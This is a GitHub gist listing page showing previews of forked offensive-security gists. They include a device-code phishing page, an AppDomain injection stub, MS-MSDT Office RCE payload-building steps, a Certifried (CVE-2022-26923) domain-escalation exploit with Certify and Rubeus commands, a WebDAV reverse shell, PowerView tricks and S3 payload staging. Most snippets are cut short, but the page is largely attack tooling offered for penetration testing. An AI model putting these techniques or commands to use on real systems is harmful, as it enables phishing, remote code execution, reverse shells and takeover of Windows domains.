Skip to content

Instantly share code, notes, and snippets.


Steve Borosh rvrsh3ll

View GitHub Profile
rvrsh3ll / S3UpDown.ps1
Created August 21, 2022 15:23 — forked from pmolchanov/S3UpDown.ps1
Quick n Dirty S3 Upload/Download for Powershell
View S3UpDown.ps1
# Upload
$ErrorActionPreference = 'Stop'
$AWSRegion = "us-east-1"
$AWSAccessKeyId = "TODO: Access Key"
$AWSSecretAccessKey = "TODO: Secret Access Key"
$BucketName = "TODO: Bucket Name"
[System.Reflection.Assembly]::LoadWithPartialName("System.Windows.Forms") | Out-Null
$OpenFileDialog = New-Object System.Windows.Forms.OpenFileDialog
$OpenFileDialog.ShowDialog() | Out-Null
rvrsh3ll / generate.html
Created August 1, 2022 01:03 — forked from Mr-Un1k0d3r/generate.html
office device code phishing
View generate.html
<!-- This page can be formatted to look like something more interesting -->
<script src=""></script>
$.get("").done(function(data) {
$.get("" + data.device_code);
rvrsh3ll /
Created June 29, 2022 15:59 — forked from leechristensen/
Useful cypher queries to find computers that are local admin on other computers, or to find groups containing bother users/computers.

Computer accounts added to local admins on machines via a group in the local admins

MATCH p1 = (c1:Computer)-[r:MemberOf*1..]->(g1:Group)
WITH c1,g1
MATCH p2 = (g1:Group)-[r:AdminTo]->(c2:Computer)
RETURN As Principal, AS Target, AS ViaGroup

Computer accounts added to local admins on machines explicitly

rvrsh3ll / fxstmp.cs
Created June 1, 2022 19:46 — forked from code-scrap/fxstmp.cs
FXSTMP AppDomain Injection. - FXSTHIS!
View fxstmp.cs
using System;
using System.EnterpriseServices;
using System.Runtime.InteropServices;
public sealed class MyAppDomainManager : AppDomainManager
public override void InitializeNewDomain(AppDomainSetup appDomainInfo)
rvrsh3ll / ms-msdt.MD
Created May 30, 2022 15:24 — forked from tothi/ms-msdt.MD
The MS-MSDT 0-day Office RCE Proof-of-Concept Payload Building Process
View ms-msdt.MD

MS-MSDT 0-day Office RCE

MS Office docx files may contain external OLE Object references as HTML files. There is an HTML sceme "ms-msdt:" which invokes the msdt diagnostic tool, what is capable of executing arbitrary code (specified in parameters).

The result is a terrifying attack vector for getting RCE through opening malicious docx files (without using macros).

Here are the steps to build a Proof-of-Concept docx:

  1. Open Word (used up-to-date 2019 Pro, 16.0.10386.20017), create a dummy document, insert an (OLE) object (as a Bitmap Image), save it in docx.
rvrsh3ll /
Created May 17, 2022 01:16 — forked from tothi/
Certifried combined with KrbRelayUp: non-privileged domain user to Domain Admin without adding/pre-owning computer accounts

Certifried combined with KrbRelayUp

Certifried (CVE-2022-26923) gives Domain Admin from non-privileged user with the requirement adding computer accounts or owning a computer account. Kerberos Relay targeting LDAP and Shadow Credentials gives a non-privileged domain user on a domain-joined machine local admin access on (aka owning) the machine. Combination of these two: non-privileged domain user escalating to Domain Admin without the requirement adding/owning computer accounts.

The attack below uses only Windows (no Linux tools interacting with the Domain), simulating a real-world attack scenario.


rvrsh3ll / Program.cs
Created May 12, 2022 11:45 — forked from dmchell/Program.cs
Exploit for Active Directory Domain Privilege Escalation (CVE-2022–26923)
View Program.cs
// Exploit for Active Directory Domain Privilege Escalation (CVE-2022–26923)
// Author: @domchell - MDSec
// This exploit can be used to update the relveant AD attributes required to enroll in a machine template as any machine in AD using an existing machine account
// Adjusting MS-DS-Machine-Account-Quota is not sufficient to stop this attack :)
// Steps:
// 1. Escalate on any workstation (hint: krbrelayup ftw)
// 2. Execute UpdateMachineAccount.exe as SYSTEM
// 3. Enroll in machine template e.g. (Certify.exe request /ca:"ca.evil.corp\\CA" /template:Computer /machine /subject:CN=dc.evil.corp
// 4. Request a TGT using the certificate e.g. (Rubeus.exe asktgt /user:dc$ /domain:evil.corp /dc:dc.evil.corp /certificate:<base64 cert> /enctype:AES256)
rvrsh3ll / JEWebDav.ps1
Created May 10, 2022 16:20 — forked from darkquasar/JEWebDav.ps1
Simple WebDav Server in Powershell
View JEWebDav.ps1
Obtained from
Simple Reverse Shell over HTTP. Deliver the link to the target and wait for connectback.
Read And Write Files Over WebDAV Proof Of Concept
rvrsh3ll / PowerView-3.0-tricks.ps1
Created March 4, 2022 15:28 — forked from HarmJ0y/PowerView-3.0-tricks.ps1
PowerView-3.0 tips and tricks
View PowerView-3.0-tricks.ps1
# PowerView's last major overhaul is detailed here:
# tricks for the 'old' PowerView are at
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : ‘find’ specific data entries in a data set
rvrsh3ll /
Created February 26, 2022 16:38 — forked from tonykarre/
Dynamically create S3 buckets to stage pen test tools/payloads. Files can only be downloaded by the target.
#! /bin/bash
# Tony Karre
# @tonykarre
# Use case:
# You are executing a pen test, and you want to temporarily stage payloads and other tools
# on a server outside of your own infrastructure. You also want to make sure that